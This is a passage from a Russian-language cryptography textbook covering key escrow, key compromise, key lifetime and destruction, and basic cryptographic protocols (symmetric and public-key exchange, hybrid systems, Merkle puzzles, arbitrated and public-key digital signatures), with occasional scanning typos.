Рассмотрим такой возможный случай. Давид Ключкис, президент фирмы "Ключкис и К°", постоянно шифрует всю информацию, связанную с делами своей фирмы. Однако, к несчастью, он переходил улицу в неположенном месте, и его сбил 10-тонный грузовик. При этом больше всего пострадала та часть его организма, которая отвечала за хранение ключей к используемому им алгоритму шифрования. И если у Абрама Ключмана, первого заместителя Ключкиса, нет копии этих ключей, их фирма окажется в незавидном положении. Целью шифрования является защита информации от посторонних. Поэтому при условии, что Ключкис использовал стойкий криптографический алгоритм, зашифрованные им данные, касающиеся дел фирмы, будут потеряны навсегда.

Избежать этой ситуации Ключману поможет схема с депонированием ключей: все служащие компании, включая ее руководителей, должны регулярно сдавать копии своих криптографических ключей начальнику службы безопасности Бориса Ключевского, который будет класть их на хранение в сейф. Узнав, что Ключкис в бессознательном состоянии попал в больницу. Ключ-май просто попросит Ключевского принести требуемые криптографические ключи. Будет еще лучше, если Ключман узнает комбинацию, открывающую сейф, заранее, чтобы не оказаться в безвыходном положении, если впечатлительного Ключевского хватит удар, когда он узнает о несчастье, приключившемся с Ключкисом.

Недостаток этой схемы хранения запасных ключей состоит в том, что руководство фирмы вынуждено доверить все свои секреты Ключевскому. Взамен лучше разделить ключи на части и раздать их различным сотрудникам службы безопасности. В результате ни один из них не сможет получить единоличный доступ к зашифрованной информации. А еще лучше записать каждую часть ключа на отдельную интеллектуальную карту. Тогда их владельцы не только не будут знать значение части ключа, которая передана им на хранение, но и можно будет проконтролировать, сколько раз владелец конкретной интеллектуальной карты участвовал в получении целого ключа из частей для осуществления доступа к зашифрованной этим ключом информации.

14. Скомпрометированные ключи

Любой стойкий шифр обеспечивает надежную защиту только до тех пор, пока ключ к нему хранится в тайне. Если Иванов потеряет этот ключ, если у него этот ключ украдут, если этот ключ зачитает диктор в вечернем выпуске телевизионных новостей или этот ключ будет скомпрометирован каким-либо другим образом, обеспечиваемая им защита будет сведена на нет.

Скомпрометированный ключ к симметричному алгоритму шифрования необходимо побыстрее сменить. После этого остается только надеяться, что противник успел узнать из прочитанной шифрпереписки не слишком мною интересного для себя. С открытыми ключами, которые используются ко только для шифрования данных, но и для аутентификации и цифровой подписи документов, дело обстоит сложнее. Поэтому так важно, чтобы о компрометации открытого ключа все заинтересованные стороны узнали как можно скорее. Если все сообщения Иванова аккуратно снабжены датой, это поможет значительно уменьшить вероятность потенциального ущерба, поскольку тогда их получатели окажутся в состоянии отобрать и проверить те из них, которые могли быть сфальсифицированы.

Если Иванов не знает, когда именно был скомпрометирован его ключ, остается только посоветовать ему аккуратнее обращаться со своими ключами и использовать для разных целей различные ключи. Ведь входные двери в его офис и в его квартиру вряд ли открываются одним и тем же ключом.

15. Продолжительность использования ключа

Любой ключ должен использоваться в течение ограниченного периода времени. Тому есть несколько причин:

  • Чем дольше ключ находится в действии, тем больше вероятность того. что он будет скомпрометирован.
  • Длительное пользование одним и тем же ключом увеличивает потенциальный ущерб, который может быть нанесен в случае его компрометации.
  • Ключ, очень долго применявшийся для шифрования информации, становится лакомым кусочком для противника, у которого появляется стимул потратить на его вскрытие значительные ресурсы, поскольку полученная выгода позволит оправдать понесенные расходы.
  • Криптоаналитическую атаку на шифр вести тем легче, чем больше перехваченного шифртекста для него накоплено.

Продолжительность использования ключа зависит от криптосистемы. В различных криптосистемах эта продолжительность должна быть разной. Для шифрования речевых сообщений, передаваемых по телефону, имеет смысл менять ключ после каждого разговора. В выделенных каналах связи продолжительность использования ключа определяется ценностью шифруемой информации и скоростью ее передачи. При скорости в 9600 бит в секунду смену ключа следует производить реже, чем при скорости в несколько гига-бит в секунду. Если условия позволяют, такие ключи необходимо менять, по крайней мере, ежедневно.

Не требуют частой смены ключи шифрования ключей. Они используются от случая к случаю, и поэтому объем перехваченного противником шифртекста для них невелик. Кроме того, про свойства соответствующего ему открытого текста противнику заранее ничего не известно, поскольку хороший ключ представляет собой достаточно случайный набор бит. Однако компрометация ключа шифрования ключей влечет за собой гораздо более серьезные потери, чем это происходит при потере сеансового ключа или ключа шифрования данных. Необходим разумный компромисс между вероятностью вскрытия ключа шифрования ключей из-за его слишком длительного использования и возможностью компрометации этого ключа при его передаче абонентам сети связи. В большинстве случаев разумной представляется ежемесячная, а иногда даже ежегодная смена ключа шифрования ключей.

Ключи, применяемые для шифрования файлов, которые хранятся на компьютерных дисках, слишком часто менять не надо. Регулярное повторное шифрование файлов на новых ключах только даст больше полезной информации криптоаналитику, который будет пытаться их вскрыть. Лучше применить подход, при котором каждый файл шифруется при помощи своего ключа. А сами ключи, в свою очередь, зашифровываются на ключе шифрования ключей, который затем прячется в надежное место (например, в стальной сейф).

Что касается открытых ключей, то продолжительность их использования сильно варьируется в зависимости от области применения. Если открытый ключ применяется для целей аутентификации или для цифровой подписи, он продолжает оставаться актуальным годами, иногда даже десятилетиями. Но даже в этом случае не следует пренебрегать сменой ключа каждые 2—3 года, чтобы в распоряжении криптоаналитика накапливалось меньше шифртекста, необходимого для организации атаки. А старый ключ все равно надо продолжать хранить в секрете — он может понадобиться, чтобы, например, подтвердить подлинность подписи, поставленной в течение периода, пока этот ключ был действующим.

16. Уничтожение ключей

 

Использованные криптографические ключи ни в коем случае не должны попасть в руки противника. Поэтому, как только в ключах отпала надобность, их следует уничтожить. Если ключи хранятся на бумажном носителе, его надо сжечь или пропустить через специальный аппарат для уничтожения бумаг, который должен быть достаточно качественным. Ведь будет очень обидно, если ваш алгоритм шифрования, способный выдержать атаку методом грубой силы в течение нескольких миллионов лет, вскроют только потому, что за несколько десятков тысяч долларов кто-то наймет сотню безработных, и за год они соберут воедино недостаточно тщательно "пережеванный" лист бумаги с записанными на нем ключами.

Если ключ хранился в СППЗУ, необходимо несколько раз записать информацию поверх него. Если для хранения ключа использовалось ПЗУ. его надо разнести молотком на мелкие кусочки и пустить их по ветру. Если ключ лежал на компьютерном диске, на место ключа придется многократно записать ничего не значащие данные или уничтожить диск подобно ПЗУ. При работе на компьютере в многозадачном режиме следует обратить особое внимание на способность операционной системы создавать временные файлы на диске для хранения рабочей копии программы шифрования и ее данных. А сверх осторожный пользователь обязательно напишет программу, которая будет отыскивать копии ключа на свободных секторах диска и затем затирать их.

 

Глава 7. Криптографические протоколы

Глава 7. Криптографические протоколы

1. Что такое криптографический протокол

 

Что такое криптографический протокол

Протокол — это последовательность шагов, которые предпринимают две или большее количество сторон для совместного решения задачи. Все шаги следуют в порядке строгой очередности, и ни один из них не может быть сделан прежде, чем закончится предыдущий. Кроме того, любой протокол подразумевает участие, по крайней мере, двух сторон. В одиночку можно, например, смешать и выпить коктейль, но к протоколу это не имеет никакого отношения. Поэтому придется угостить кого-нибудь сделанным коктейлем, чтобы его приготовление и дегустация стали настоящим протоколом. И наконец протокол обязательно предназначен для достижения какой-то цели.

Протоколы имеют и другие отличительные черты:

  • каждый участник протокола должен быть заранее оповещен о шагах, которые ему предстоит предпринять;
  • все участники протокола должны следовать его правилам добровольно. без принуждения;
  • необходимо, чтобы протокол допускал только однозначное толкование, а его шаги были совершенно четко определены и не допускали возможности их неправильного понимания;
  • протокол должен содержать описание реакции его участников на любые ситуации, возникающие в ходе реализации этого протокола — иными словами, недопустимым является положение, когда для возникшей ситуации протоколом не определено соответствующее действие.

Криптографическим протоколом называется такой, в основе которого лежи: криптографический алгоритм. Однако целью криптографического протокол;! зачастую является не только сохранение информации в тайне от посторонних. Участники криптографического протокола могут быть близкими друзьями, у которых нет друг от друга секретов, а могут являться настолько непримиримыми врагами, что каждый из них отказывается сообщить другому. какое сегодня число. Тем не менее, им может понадобиться поставить сноп подписи под совместным договором или удостоверить свою личность. В этом случае криптография нужна, чтобы предотвратить или обнаружим, подслушивание посторонними лицами, не являющимися участниками протокола, а также не допустить мошенничества. Поэтому часто требуется, чтобы криптографический протокол обеспечивал следующее: его участники не могут сделать или узнать больше того, что определено протоколом.

Зачем нужны криптографические протоколы

В повседневной жизни нам приходится сталкиваться с протоколами буквально на каждом шагу — играя в любые игры, делая покупки в магазинах или голосуя на выборах. Многими протоколами нас научили пользоваться родители, школьные учителя и друзья. Остальные мы сумели узнать самостоятельно.

В настоящее время люди все чаще контактируют друг с другом при помощи компьютеров. Компьютеры же, в отличие от большинства людей, в школу не ходили, у них не было родителей, да и учиться самостоятельно они не в состоянии. Поэтому компьютеры приходится снабжать формализованными протоколами, чтобы они смогли делать то, что люди выполняют особо не задумываясь. Например, если в магазине не окажется кассового аппарата, вы нее равно сможете купить в нем необходимую вещь. Однако такое кардинальное изменение протокола поставило бы бедный компьютер в полный тупик.

Большинство протоколов, которые люди используют при общении друг с другом с глазу на глаз, хорошо себя зарекомендовали только потому, что их участники имеют возможность вступить в непосредственный контакт. Взаимодействие с другими людьми через компьютерную сеть, наоборот, подразумевает анонимность. Будете ли вы играть с незнакомцем в преферанс, не видя, как он тасует колоду и раздает карты? Доверите ли вы своп деньги совершенно постороннему человеку, чтобы он купил вам что-нибудь в магазине? Пошлете ли вы свой бюллетень голосования по почте, зная, что с ним сможет ознакомиться любой из почтовых работников и потом рассказать всем о ваших нетрадиционных политических пристрастиях? Думаю, что нет.

Глупо считать, что компьютерные пользователи ведут себя более честно, чем абсолютно случайные люди. То же самое касается и сетевых администраторов, и проектировщиков компьютерных сетей. Большинство из них и в самом деле честные люди, однако есть и такие, кто может причинить нам большие неприятности. Поэтому так нужны криптографические протоколы. использование которых позволяет защититься от непорядочных людей.

Распределение ролей

Чтобы описание протоколов было более наглядным, имена их участников однозначно определяют роли, им уготованные (табл. 7.1). Пусть Антон и Борис принимают участие во всех двухсторонних протоколах. Как правило, начинает выполнение шагов, предусмотренных протоколом, Антон, а ответные действия предпринимает Борис. Если протокол является грех- или четырехсторонним, исполнение соответствующих ролей берут на себя Владимир и Георгий. Об остальных персонажах подробнее будет рассказано позже.

Таблица 7.1. Роли, которые играют участники протоколов


Участник протокола Роль в протоколе
Антон Первый участник протоколов
Борис Второй участник протоколов
Владимир Участник трех- и четырехсторонних протоколов
Георгий Участник четырехсторонних протоколов
Дмитрий Доверенное лицо, наделенное правами арбитра
Зиновий Злоумышленник
Кирилл Контролер
Олег Охранник
Петр Подслушивает за участниками протоколов
Сергей Свидетель

Протокол с арбитражем

Арбитр — участник протокола, которому остальные участники полностью доверяют, предпринимая соответствующие действия для завершения очередного шага протокола. Это значит, что у арбитра нет личной заинтересованности в достижении тех или иных целей, преследуемых участниками протокола, и он не может выступить на стороне любого из них. Участники протокола также принимают на веру все, что скажет арбитр, и беспрекословно следуют всем его рекомендациям.

В протоколах, которым мы следуем в повседневной жизни, роль арбитра чаще играет адвокат. Однако попытки перенести протоколы с адвокатом в качестве арбитра из повседневной жизни в компьютерные сети наталкиваются на существенные препятствия.

  • Легко довериться адвокату, про которого известно, что у него незапятнанная репутация, и с которым можно установить личный контакт. Однако если два участника протокола не доверяют друг другу, арбитр, не облаченный в телесную оболочку и существующий где-то в недрах компьютерной сети, вряд ли будет пользоваться у них доверием.
  • Расценки за услуги, оказываемые адвокатом, известны. Кто и каким образом будет оплачивать издержки за аналогичные услуги арбитра в компьютерной сети?
  • Введение арбитра в любой протокол увеличивает время, затрачиваемое на реализацию этого протокола.
  • Поскольку арбитр контролирует каждый шаг протокола, его участие и очень сложных протоколах может стать узким местом при их реализации. Увеличение числа арбитров позволяет избавиться от данного узкого места, однако одновременно возрастут и накладные расходы на реализацию протокола.
  • В силу того, что все участники протокола должны пользоваться услугами одного и того же арбитра, действия злоумышленника, который решит нанести им ущерб, будут направлены, в первую очередь, против этого арбитра. Следовательно, арбитр представляет собой слабое звено любого протокола с арбитражем.

Несмотря на отмеченные препятствия, протоколы с арбитражем находи г широкое применение на практике. В ходе дальнейшего изложения доверенное лицо, наделенное правами арбитра, будет именоваться Дмитрием.

Протокол с судейством

Чтобы снизить накладные расходы на арбитраж, протокол, в котором участвует арбитр, часто делится на две части. Первая полностью совпадает с обычным протоколом без арбитража, а ко второй прибегают только в случае возникновения разногласий между участниками. Для разрешения конфликтов между ними используется особый арбитр — судья.

Подобно арбитру, судья является незаинтересованным участником протокола, которому остальные участники доверяют. Однако в отличие от арбитра. судья участвует отнюдь не в каждом шаге протокола. Услугами судьи пользуются, только если требуется разрешить сомнения относительно правильности действий участников протокола. Если таких сомнений ни у кою не возникает, судейство не понадобится.

В компьютерных протоколах с судейством предусматривается наличие данных, проверив которые доверенное третье лицо может решить, не смошенничал ли кто-либо из участников этого протокола. Хороший протокол с судейством также позволяет выяснить, кто именно ведет себя нечестно Это служит прекрасным превентивным средством против мошенничества со стороны участников такого протокола.

Самоутверждающийся протокол

Самоутверждающийся протокол не требует присутствия арбитра для завершения каждого шага протокола. Он также не предусматривает наличие судьи для разрешения конфликтных ситуаций. Самоутверждающийся протокол устроен так, что, если один из его участников мошенничает, другие смогут моментально распознать нечестность, проявленную этим участником, и прекратить выполнение дальнейших шагов протокола.

Конечно же, хочется, чтобы существовал универсальный самоутверждающийся протокол на все случаи жизни. Однако на практике в каждом конкретном случае приходится конструировать свой специальный самоутверждающийся протокол.

Разновидности атак на протоколы

Атаки на протоколы бывают направлены против криптографических алгоритмов, которые в них задействованы, против криптографических методов, применяемых для их реализации, а также против самих протоколов. Для начала предположим, что используемые криптографические алгоритмы и методы являются достаточно стойкими, и рассмотрим атаки собственно на протоколы.

Если некто, не являющийся участником протокола, попытается подслушать информацию, которой обмениваются его участники, — это пассивная атака на протокол. Она так названа потому, что атакующий (будем именовать его Петром) может только накапливать данные и наблюдать за ходом событий, но не в состоянии влиять на него. Пассивная атака подобна криптоаналитической атаке со знанием только шифртекста. Поскольку участники протокола не обладают надежными средствами, позволяющими им определить, что они стали объектом пассивной атаки, для защиты от нее используются протоколы, дающие возможность предотвращать возможные неблагоприятные последствия пассивной атаки, а не распознавать ее.

Атакующий может попытаться внести изменения в протокол ради собственной выгоды. Он может выдать себя за участника протокола, внести изменения в сообщения, которыми обмениваются участники протокола, подменить информацию, которая хранится в компьютере и используется участниками протокола для принятия решений. Это активная атака на протокол, поскольку атакующий (назовем его Зиновием) может вмешиваться в процесс выполнения шагов протокола его участниками.

Итак, Петр пытается собрать максимум информации об участниках протокола и об их действиях. У Зиновия же совсем другие интересы — ухудшение производительности компьютерной сети, получение несанкционированного доступа к ее ресурсам, внесение искажений в базы данных. При этом и Петр, и Зиновий не обязательно являются совершенно посторонними лицами. Они могут быть легальными пользователями, системными и сетевыми администраторами, разработчиками программного обеспечения и даже участниками протокола, которые ведут себя непорядочно или даже вовсе не соблюдают этот протокол. В последнем случае атакующий называется мошенником. Пассивный мошенник следует всем правилам, которые определены протоколом, но при этом еще и пытается узнать о других участниках больше, чем предусмотрено этим протоколом. Активный мошенник вносит произвольные изменения в протокол, чтобы нечестным путем добиться для себя наибольшей выгоды.

Защита протокола от действий нескольких активных мошенников представляет собой весьма нетривиальную проблему. Тем не менее при некоторых условиях эту проблему удается решить, предоставив участникам протокола возможность вовремя распознать признаки активного мошенничества. А защиту от пассивного мошенничества должен предоставлять любой протокол вне зависимости от условий, в которые поставлены его участники.

Протокол обмена сообщениями с использованием симметричного шифрования

Предположим, что Антон и Борис хотят обмениваться секретными сообщениями по каналу связи, не защищенному от подслушивания. Естественно. им придется воспользоваться шифрованием. Однако чтобы Антон успешно зашифровал свое сообщение Борису, а тот, получив это сообщение, смог его расшифровать, они должны действовать в соответствии со следующим протоколом:

1. Антон и Борис уславливаются о том, какой криптосистемой они будут пользоваться.

2. Антон и Борис генерируют ключи для шифрования и расшифрования своих сообщений и затем обмениваются ими.

3. Антон шифрует сообщение с использованием криптографического алгоритма и ключа, о которых он заранее договорился с Борисом.

4. Антон отправляет зашифрованное сообщение Борису.

5. Борис расшифровывает полученное сообщение, применяя тот же криптографический алгоритм и ключ, которыми пользовался Антон.

Если Петр имеет возможность перехватывать сообщения, которые передают друг другу Антон и Борис, он может попытаться прочесть эти сообщения. Если Антон и Борис используют стойкий алгоритм шифрования. — они в безопасности. Однако Петр может оказаться в состоянии подслушивать за Антоном и Борисом, когда они выполняют шаг 1 и шаг 2 протокола. Поэтому стойкая криптосистема не должна опираться на сохранение в тайне алгоритма шифрования. Необходимо, чтобы ее стойкость определялась одной только длиной секретного ключа. Тогда Антон и Борис могут условиться, каким шифром они будут пользоваться, ничуть не заботясь о том, что их подслушает Петр. Тем не менее, шаг 2 протокола все равно должен выполняться ими в обстановке строжайшей секретности. Требуется, чтобы свои сгенерированные ключи Антон и Борис хранили в секрете до, во время и после процесса выполнения всех шагов протокола. Иначе Петр сможет прочесть всю их шифрованную переписку.

Что касается Зиновия, то в зависимости от преследуемых целей он может действовать по-разному. Если Зиновий прервет связь между Антоном и Борисом, они будут не в состоянии обмениваться сообщениями. Зиновий может заменить шифрованное сообщение, посланное Антоном, на свое собственное. Попытавшись расшифровать поддельное сообщение, Борис вместо осмысленного открытого текста получит абракадабру, и решит, что Антон не слишком серьезно отнесся к шифрованию своего сообщения или что при передаче оно было просто искажено. Хуже, если Зиновий узнает ключ, которым пользуются Антон и Борис. Тогда он сможет зашифровать любое сообщение и отправить его Борису от имени Антона, а у Бориса не будет возможности распознать подделку.

Если Антон вознамерится навредить Борису, тот будет не в силах ему помешать. Например, Антон может заставить Бориса отказаться от обмена сообщениями. Для этого Антону достаточно передать копию ключа Петру с условием, что Петр опубликует открытые тексты сообщений Бориса в газете для всеобщего обозрения. Это значит, что, используя приведенный выше протокол, Антон и Борис должны полностью доверять друг другу.

Подводя итог сказанному, следует еще раз подчеркнуть, что в протоколах обмена сообщениями с использованием симметричного шифрования ключи должны храниться и распределяться между участниками протокола в строжайшем секрете. Ключи являются не менее ценными, чем сама информация, которая шифруется с их использованием, поскольку знание ключей противником открывает ему неограниченный доступ к этой информации.

Протокол обмена сообщениями с использованием шифрования с открытым ключом

Симметричную криптосистему можно сравнить с сейфом. Криптографический ключ соответствует комбинации, отпирающей сейф. Каждый, кто знает комбинацию, может открыть сейф. Тому, кто комбинацией не владеет, но все равно желает знакомиться с содержимым сейфа, лучше записаться на курсы медвежатников, если таковые, конечно, существуют.

В 1976 г. американские криптологи У. Диффи и М. Хеллман изобрели криптографию с открытым ключом. Они предложили использовать два вида ключей — открытые и тайные. Вычислить тайный ключ, зная только открытый, очень сложно. Человек, владеющий открытым ключом, может с его помощью зашифровать сообщение. Расшифровать это сообщение в состоянии только тот, кто имеет соответствующий тайный ключ. В отличие от симметричной криптосистемы, для алгоритма шифрования с открытым ключом больше подходит сравнение с почтовым ящиком. Опустить почту и этот ящик очень просто, равно как и зашифровать сообщение с применением открытого ключа. А извлечение из почтового ящика находящейся в нем корреспонденции сродни расшифрованию сообщения. Желающего сделать это без ключа вряд ли ожидает легкая работа. Обладатель же ключа откроет почтовый ящик, т. е. расшифрует сообщение, без особого труда.

При зашифровании и расшифровании сообщений в криптосистеме с открытым ключом используется однонаправленная функция с лазейкой. Причем зашифрование соответствует вычислению значения этой функции, а расшифрование — ее обращению. Поскольку и открытый ключ, и сама функция не являются секретными, каждый может зашифровать свое сообщение с их помощью. Однако обратить функцию, чтобы получить открытый текст зашифрованного сообщение, в разумные сроки не сможет никто. Для этого необходимо знать лазейку, т. е. тайный ключ. Тогда расшифрование будет таким же легким, как и зашифрование.

Протокол обмена сообщениями с использованием шифрования с открытым ключом выглядит следующим образом:

  1. Антон и Борис уславливаются о том, какой криптосистемой они будут пользоваться.
  2. Борис посылает Антону свой открытый ключ.
  3. Антон шифрует открытый текст своего сообщения при помощи открытого ключа, присланного ему Борисом, и шлет полученный в результате шифртекст Борису.
  4. Борис расшифровывает сообщение Антона, используя свой тайный ключ.

Применение криптографии с открытым ключом позволяет решить проблему передачи ключей, которая присуща симметричным криптосистемам. Без какой-либо предварительной подготовки Антон может отправить зашифрованное сообщение Борису. И хотя в распоряжении Петра окажутся и сам алгоритм шифрования, и зашифрованное Антоном сообщение, и лаже использованный им для этого ключ, Петр все равно не сможет расшифровать данное сообщение.

Чтобы упростить протокол обмена шифрованными сообщениями, открытые ключи всех абонентов единой сети связи часто помещаются в справочную базу данных, находящуюся в общем пользовании этих абонентов. Тогда протокол обмена сообщениями с использованием шифрования с открытым ключом имеет следующий вид:

1. Антон находит открытый ключ Бориса в базе данных.

2. Антон шифрует открытый текст своего сообщения при помощи открытого ключа Бориса.

3. Борис расшифровывает сообщение Антона, используя свой тайный ключ.

Второй протокол в большей степени напоминает отправку писем по почте, поскольку получатель сообщения не является участником протокола до тех самых пор, пока не захочет ознакомиться с открытым текстом этого сообщения.

Гибридные криптосистемы

На практике криптосистемы с открытым ключом используются для шифрования не сообщений, а ключей. На это есть две основные причины:

  • Алгоритмы шифрования с открытым ключом в среднем работают в тысячи раз медленнее, чем алгоритмы с симметричным ключом. И хотя темпы роста компьютерной производительности очень высоки, требования к скорости шифрования растут не менее стремительно. Поэтому криптосистемы с открытым ключом вряд ли когда-нибудь смогут удовлетворить современные потребности в скорости шифрования.
  • Алгоритмы шифрования с открытым ключом уязвимы по отношению к криптоаналитическим атакам со знанием открытого текста. Пусть С=Е(Р), где С обозначает шифртекст, Р — открытый текст, Е — функцию шифрования. Тогда, если Р принимает значения из некоторого конечного множества, состоящего из n открытых текстов, криптоаналитику достаточно зашифровать все эти тексты, используя известный ему открытый ключ, и сравнить результаты с С. Ключ таким способом ему вскрыть не удастся, однако открытый текст будет успешно определен.

Чем меньше количество ( n ) возможных открытых текстов, тем эффективнее будет атака на криптосистему с открытым ключом. Например, если криптоаналитику известно, что шифрованию подверглась сумма сделки, не превышающая 1 млн долл., он может перебрать все числа от 1 до 1 000 000.

В большинстве случаев криптографические алгоритмы с открытым ключом применяются для шифрования сеансовых ключей при их передаче абонентам сети связи. Соответствующий протокол выглядит обычно так:

1. Антон генерирует сеансовый ключ К и шифрует его с использованием открытого ключа В, принадлежащего Борису:

Е В (К)

2. Борис расшифровывает сообщение Антона при помощи своего тайного ключа и получает в результате сеансовый ключ К. сгенерированный Антоном:

K=D B (E B (K))

3. Антон и Борис обмениваются сообщениями, зашифрованными одним и тем же сеансовым ключом К.

Данный протокол позволяет не хранить ключи в течение неопределенного периода времени до тех пор, пока они не понадобятся в очередном сеансе связи. Сеансовый ключ можно сгенерировать и отправить по требуемому ; адресу непосредственно перед посылкой сообщения, которое предполагается зашифровать на этом ключе, а потом его сразу уничтожить. Тем самым уменьшается вероятность компрометации сеансового ключа. И хотя тайным ключ также может быть скомпрометирован, риск здесь значительно меньше поскольку тайный ключ используется очень редко — только для однократного зашифрования сеансового ключа.

 "Шарады" Меркля

Оригинальный протокол обмена ключами был предложен американским криптологом Р. Мерклем (R.-Merkle) в 1974 г. Данный протокол основывается на так называемых "шарадах", которые требуется решить для получения ключа. Это гораздо легче сделать отправителю и получателю шифрованных сообщений, чем криптоаналитику, перехватывающему их. В результате Антон может послать шифрованное сообщение Борису, предварительно не передавая ему секретного ключа:

1. Борис генерирует 2 20 (около 1 млн) сообщений вида: "Это шарада под номером х. Это секретный ключ под номером у", где х — случайное число, у— случайный секретный ключ. Пара х, у является уникальной для каждого сообщения. Затем Борис шифрует все эти сообщения при помощи какого-либо симметричного алгоритма на различных 20-битных ключах и отсылает Антону.

2. Антон случайным образом выбирает одно из шифрованных сообщений, присланных Борисом, и методом тотального перебора получает открытый текст этого сообщения.

3. Антон шифрует свое собственное секретное сообщение при помощи другого симметричного алгоритма на ключе у, вскрытом им методом тотального перебора, и посылает это сообщение вместе с соответствующим х.

4. Борис, зная соответствие между х и у, расшифровывает сообщение, пришедшее ему от Антона.

Конечно же, Петр может вскрыть ключ, который был использован Антоном для зашифрования секретного сообщения, однако для этого Петру придется выполнить значительно больший объем вычислений, чем Антону и Борису Петр должен будет прочесть все 2 20 шифрованных сообщений, отправленных Борисом, чтобы найти у, соответствующее значению х, выбранному Антоном. На решение этих "шарад" Петр потратит примерно квадрат времени. которое потребуется Антону и Борису, чтобы их составить. И хотя такое отличие в трудоемкости по криптографическим меркам довольно невелико, в некоторых случаях этого может оказаться достаточно. Например, если Антон и Борис смогут опробовать по 10 тыс. ключей в секунду, им понадобится немногим более 1 минуты, чтобы ключ шифрования у оказался в руках Антона. В то же время у Петра, обладающего примерно такой же вычислительной мощью для опробования ключей, как Антон и Борис, на вскрытие правильного ключа уйдет больше года.

 

2. Цифровая подпись

Цифровая подпись

Собственноручная подпись под документом с давних пор используется людьми в качестве доказательства того факта, что человек, подписавший данный документ, ознакомился и согласен с его содержанием. Почему же подпись заслужила такое доверие со стороны человечества? Перечислим основные причины.

  • Подлинность подписи можно проверить. Ее присутствие в документе позволяет убедиться, действительно ли он был подписан человеком, который обладает правом ставить эту подпись.
  • Подпись нельзя подделать. Наличие подлинной подписи является доказательством того, что именно тот человек, которому она принадлежит, поставил эту подпись под документом.
  • Подпись, которая уже стоит под одним документом, не может быть использована еще раз для подписания второго документа. Иными словами, подпись является неотъемлемой частью документа и не может быть перенесена в другой документ.
  • Подписанный документ не подлежит никаким изменениям.
  • От подписи невозможно отречься. Тот, кто поставил подпись под документом, не может впоследствии заявить, что он не подписывал этот документ.

На самом деле, ни одно из перечисленных свойств подписи не выполняется на все 100%. Подписи подделываются и копируются, от них отрекаются, а в уже подписанные документы впоследствии вносятся произвольные изменения. Однако люди вынуждены мириться с недостатками, присущими подписи, поскольку мошеннические трюки с подписями проделывать не так-то просто и шансы быть пойманными у таких мошенников достаточно велики.

Попытка использовать подпись в компьютерных файлах сопряжена с еще большими трудностями. Во-первых, любой файл может быть скопирован вместе с имеющейся в нем подписью. Во-вторых, после подписания в файл можно внести любые изменения, которые в принципе не поддаются обнаружению.

Подписание документов при помощи симметричных криптосистем и арбитра

Предположим, что Антон должен послать подписанное им цифровое сообщение Борису. Для этого потребуются симметричная криптосистема и арбитр Дмитрий, который может обмениваться шифрованной информацией и с Антоном, и с Борисом. Чтобы общаться с Антоном, Дмитрий использует ключ К А, а сообщения, предназначенные Борису, Дмитрий шифрует с помощью ключа К Б считается, что передача ключей всем заинтересованным сторонам произошла еще до того, как у Антона появилась потребность отправить Борису подписанный цифровой документ. Тогда Антон. Борис и Дмитрий могут действовать в соответствии со следующим протоколом:

1. Антон шифрует свое сообщение Борису на ключе К А и посылает это сообщение Дмитрию.

2. Дмитрий расшифровывает полученное сообщение, присоединяет к нему собственное заявление о принадлежности этого сообщения Антону,  шифрует сообщение Антона и свое заявление на ключе К Б , а затем отправляет их Борису.

3. Борис расшифровывает сообщение, пришедшее от Дмитрия. В результате Борис может прочесть как открытый текст сообщения Антона, так и подтверждение того факта, что этот текст принадлежит Антону.

Дмитрий уверен в том, что автором полученного сообщения является Антон. поскольку лишь Антон владеет секретным ключом К А и, следовательно. только он мог зашифровать это сообщение с помощью К А .

Данный протокол позволяет удостоверять принадлежность цифровою документа конкретному лицу подобно тому, как это делается при помощи анализа его собственноручной подписи, но при одном важном условии: Дмитрий пользуется абсолютным доверием со стороны всех без исключения участников протокола, поэтому что бы он ни сказал, принимается остальными на веру без тени сомнения.

Если Борис захочет продемонстрировать документ, подписанный Антоном. кому-нибудь еще, например, Владимиру, им всем снова придется прибегнуть к услугам вездесущего и кристально честного Дмитрия:

1. Борис шифрует сообщение Антона и заявление Дмитрия о том, что это сообщение действительно пришло от Антона, с помощью ключа К Б и отсылает их Дмитрию.

2. Дмитрий расшифровывает полученное от Бориса сообщение, заглядывает в свой архив и убеждается, что Борис не внес никаких изменений в исходный открытый текст сообщения Антона.

3. Дмитрий зашифровывает сообщение Бориса с помощью ключа К Б , используемого для связи с Владимиром, и шлет это сообщение Владимиру.

4. Владимир расшифровывает сообщение Дмитрия и получает как открытый текст сообщения Антона, так и подтверждение того факта, что лея текст на самом деле принадлежит Антону.

Заметим, что от протокола к протоколу у Дмитрия появляется все больше обязанностей. Он шифрует и расшифровывает сообщения, сравнивает их между собой, дописывает к ним заявления об их авторстве, ведет архив сообщений и разрешает возникающие конфликты. При этом Дмитрий не может допустить ни малейшей ошибки, поскольку иначе он безвозвратно утратит доверие остальных участников протокола. Да и проникновение злоумышленника Зиновия в архив Дмитрия чревато последствиями, которые надолго отобьют у всех охоту ставить свои подписи под цифровыми документами. Поэтому практическое использование подписей, которые заверяются при помощи симметричной криптосистемы и арбитра, является весьма ограниченным.

Подписание документов при помощи криптосистем с открытым ключом

Протокол подписания документа при помощи криптосистемы с открытым ключом достаточно незатейлив:

1. Антон шифрует документ с использованием тайного ключа, тем самым проставляя под этим документом свою подпись, и отправляет ею Борису.

2. Борис расшифровывает документ с использованием открытого ключа Антона, тем самым проверяя подлинность подписи.

От Дмитрия здесь совершенно не требуется вести обширную шифрованную переписку с участниками протокола. Он даже не нужен, чтобы проверять подлинность подписи. Если Борис не сможет расшифровать документ с использованием открытого ключа, принадлежащего Антону, значит, подпись под этим документом недействительна. Тем не менее, Дмитрий понадобится, чтобы удостовериться, что открытый ключ Антона действительно принадлежит именно Антону.

Отметка о времени подписания документа

К сожалению, при некоторых обстоятельствах Борис может обмануть Антона, если воспроизведет точную копию документа вместе с подписью, поставленной под ним Антоном. Еще одна копия документа, который представляет собой обычный деловой договор между двумя сторонами, по; оды не сделает. Однако если у Бориса в руках окажется точная копия чека на кругленькую сумму, выписанного Антоном, последний может понести значительный материальный ущерб.

Поэтому, как и в обыденной жизни, на все документы обычно ставятся дата и время их подписания, которые, в свою очередь, также снабжаются цифровой подписью наравне с самим документом. В результате банк сможет разоблачить попытку дважды обналичить один и тот же чек, а у смошенничавшего Бориса в тюрьме будет много свободного времени, которое он сможем посвятить более тщательному изучению криптографических протоколов.

Использование однонаправленных хэш-функций для подписания документов

